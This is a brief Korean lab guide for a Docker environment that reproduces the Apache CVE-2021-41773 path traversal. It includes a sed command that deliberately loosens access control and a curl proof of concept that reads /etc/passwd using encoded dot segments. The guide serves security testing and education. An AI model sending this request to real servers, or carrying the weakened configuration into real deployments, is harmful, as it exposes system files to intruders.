
Docker 기반의 실습 환경으로, CVE-2021-41773 Apache 경로 탐색 취약점에 대한 PoC 익스플로잇 및 보안 테스트와 교육을 위한 상세 가이드를 제공합니다.
-> Base Image: httpd:2.4.49 (취약점이 존재하는 버전)
-> 'sed -i 's/Require all denied/Require all granted/g' : Path Traversal 허용 및 외부 접근
-> Apache 정의
-> 8080 포트를 컨테이너의 80 포트로 매핑
docker 실행
PoC 실행
-> curl http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd
-> /etc/passwd는 민감한 정보를 담고 있음, %2e는 ..의 인코딩된 단어이며 이는 상위 디렉터리로 이동하는 명령
-> 경로를 조작하여 서버가 /etc/passwd에 접근하고 이를 출력하도록 함
-> 상기 이미지와 같이 민감한 디렉터리에 접근 가능
https://github.com/JIYUN02/cve-2021-41773
-> 커밋 이력 존재